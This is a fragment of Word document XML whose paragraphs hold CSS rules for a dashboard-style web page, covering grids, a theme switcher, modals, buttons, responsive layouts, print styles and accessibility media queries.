    <w:p w14:paraId="1DF455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187050E" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73D9C5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GRID LAYOUTS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04735A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.agent-grid {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585D92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display: grid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BC8D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grid-template-columns: repeat(auto-fit, minmax(320px, 1fr));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1497DA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gap: 1.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209A6D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margin-bottom: 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F772A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9A787A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B0C39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.metrics-grid {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F09E5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display: grid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09AB51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grid-template-columns: repeat(auto-fit, minmax(250px, 1fr));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C7142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gap: 1.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7009D0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margin-bottom: 2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4391A0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4BD0BDE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="237D16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PROGRESS RINGS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E701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.progress-ring {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="092B00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100px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51C035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100px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55CD7B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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470D50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4E42C03" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="207967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.progress-ring circle {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7EAF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stroke-dashoffset 0.6s ease-in-out;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532475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rotate(-90deg);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B6CA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transform-origin: 50% 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57890A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F6BC73F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C796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THEME SWITCHER === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E1B1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.theme-switcher {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485326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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39094A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top: 80px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346AF3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right: 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061A84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1000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="425488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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4010EF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flex-direction: column;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D2F2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gap: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB110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2DD632F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2232C1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.theme-btn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10265F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44px; /* Touch target */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3CE4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44px; /* Touch target */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A202E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50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA7D0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border: 2px solid rgba(255, 255, 255, 0.3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03FBD4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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F05EA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all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510D9B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backdrop-filter: blur(10px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120527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touch-action: manipulation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ABA73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DECF766" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DBC2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.theme-btn:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D47A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.theme-btn:active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6457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scale(1.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D8E00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border-color: rgba(255, 255, 255, 0.6);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAD94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D1ABA99" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75754C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.theme-btn.active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FF78C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border-color: var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E148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box-shadow: 0 0 20px var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B97C6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8AE4573" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70AB1B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EVENT LOG === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F547F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.event-log {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B88A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max-height: 300px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DB3DF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overflow-y: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1887B4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93591F0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="072C7E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.event-item {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B42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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380E38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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148D9B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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17A544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margin-bottom: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A40A5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rgba(255, 255, 255, 0.05);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D1848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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A71B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backdrop-filter: blur(10px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C8CE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all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AACF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min-height: 48px; /* Touch target */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE073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6C65DD9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330B55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.event-item:hover,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54E593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.event-item:active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662D1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translateX(5px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1808E2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rgba(255, 255, 255, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E3EA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DA66970" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2427CC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MODAL STYLES === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EA6E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.modal {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4FE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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DD1AB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inset: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA9E0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rgba(0, 0, 0, 0.8);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13170E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backdrop-filter: blur(10px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768405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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8AA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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A3B3D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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC24A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2000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BCF8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opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49958E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visibility: hidden;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="098C96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all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7182BD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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB9F3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BB4669C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32D162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.modal.active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD0E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opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DDBA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visibility: visible;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3553B4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74123B0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4902FA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.modal-content {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125D02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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="153AF1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backdrop-filter: blur(20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="114E62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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072BAD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20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B006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2rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FDD0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max-width: 90vw;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C2FDA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max-height: 80vh;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DB62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overflow-y: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="155E15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scale(0.9);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="556D88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transform 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661205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100%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6EB2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max-width: 600px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBB12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CBD0E59" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BDC30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.modal.active .modal-content {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="793E1D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scale(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEC97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56D4FCE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D9B74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CHARTS CONTAINER === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA6D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.chart-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B5DD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relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FE66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300px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAF9D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1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3D4F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12CEED4" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D321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MICRO UPDATES === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B111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.micro-update {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650625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fixed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37DB27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top: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8469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50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE151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translate(-50%, -50%);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E03DE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var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557239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color: var(--deep-space);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A19C3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16px 24px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696A58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50px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FD314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font-weight: bold;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC73E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font-size: 16px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B8B5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3000;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0B00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opacity: 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="772690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scale: 0.5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8F82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all 0.4s cubic-bezier(0.175, 0.885, 0.32, 1.275);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25957A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min-height: 48px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7278E0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display: flex;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="223A1D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align-items: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A9B47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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221670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1D4A644" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65FB63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.micro-update.show {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7832AA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opacity: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC926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scale: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D6DC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AE68DE5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DE78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BUTTONS &amp; INTERACTIVE ELEMENTS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C3F5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button, .btn {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A055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min-height: 44px; /* Touch target */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF147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min-width: 44px; /* Touch target */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0649B4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12px 20px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54980C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12px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682EF7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border: 1px solid var(--border-glow);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3EE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var(--bg-card);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198462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color: var(--text-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B2C6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cursor: pointer;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13860D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all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C753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touch-action: manipulation;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31D4A1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backdrop-filter: blur(10px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4537DE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B6AC201" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A152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button:hover, button:active, .btn:hover, .btn:active {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF7B2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var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258124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color: var(--deep-space);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="667514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scale(0.98);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349B29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F9F542C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6CE6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RESPONSIVE DESIGN === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CF4B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@media (max-width: 768px) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A221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.main-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DB56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padding: 1rem 0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A396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2E2A6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C1EDA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.quantum-counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="069F4E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padding: 2rem 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28957B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9BA1A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3A1C8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.agent-grid {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3086E4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grid-template-columns: 1fr;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F875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gap: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0B9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DC8CA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B1AC9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.metrics-grid {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DC2C8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grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44841A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gap: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF9F7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2A5F4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3A7AD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.theme-switcher {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A65A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position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FB6E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top: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D658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right: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FFE9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flex-direction: row;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BBCC2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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53913D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margin-bottom: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E3C1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D817980" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1EEE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.connection-status {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB93D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position: relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597908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top: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13480E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left: auto;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6B16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margin-bottom: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D556B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justify-content: center;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511517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13816B0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FCB35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.chart-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41C8C3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height: 250px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF69C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8E773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25225FD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14881C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@media (max-width: 480px) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B365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.main-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CDF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padding: 0.5rem 0.25rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1E21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7EE5D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E7897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.glass-card {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03525C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border-radius: 15px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B3F6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margin-bottom: 1rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F59F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4ECA1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50834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.quantum-counter {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD81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padding: 1.5rem 0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD74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B48AD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E36A3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.progress-ring {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112B8F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width: 80px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F24D4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height: 80px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F69C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9D58C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0794CD9" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788608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PRINT/PDF STYLES === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FF52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@media print {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A55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body {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558870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background: white !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3EAF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color: black !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75D094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DE179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E081E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.glass-card {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088702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background: rgba(0, 0, 0, 0.05) !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E71CE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border: 1px solid #ccc !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F155A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box-shadow: none !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615081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break-inside: avoid;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688284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21847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87E67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.theme-switcher,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1467EE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.install-prompt,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7222BD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.connection-status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BFA0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#particles-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076D76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display: none !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D5DBA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FC8D7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6FF63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.main-container {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA27C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padding: 0 !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0DC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max-width: none !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4841CD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F81FF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92848C7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797CE0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SCROLLBAR STYLING === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C8B8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::-webkit-scrollbar {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4E1D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8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C1C2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C4BC3B6" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="219FCB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::-webkit-scrollbar-track {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5D11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rgba(255, 255, 255, 0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F637D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10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C351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E25C28B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A53A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::-webkit-scrollbar-thumb {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C69D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var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188FA3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10px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5988A6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A7233F2" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A3FB2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::-webkit-scrollbar-thumb:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389FFA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var(--accent-secondary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6405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444FF76" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="760937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ACCESSIBILITY === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A937C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@media (prefers-reduced-motion: reduce) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67265E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*, ::before, ::after {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4604DC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animation-duration: 0.01ms !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439384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animation-iteration-count: 1 !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D48B1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transition-duration: 0.01ms !important;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D823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6C8D0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0EEEAD5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18B3E6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HIGH CONTRAST MODE === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4891AB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@media (prefers-contrast: high) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177124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.glass-card {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9943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border-width: 2px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14BCEE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background: rgba(255, 255, 255, 0.2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F2274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7D0FC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773C6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&lt;/style&gt;</w:t>
      </w:r>
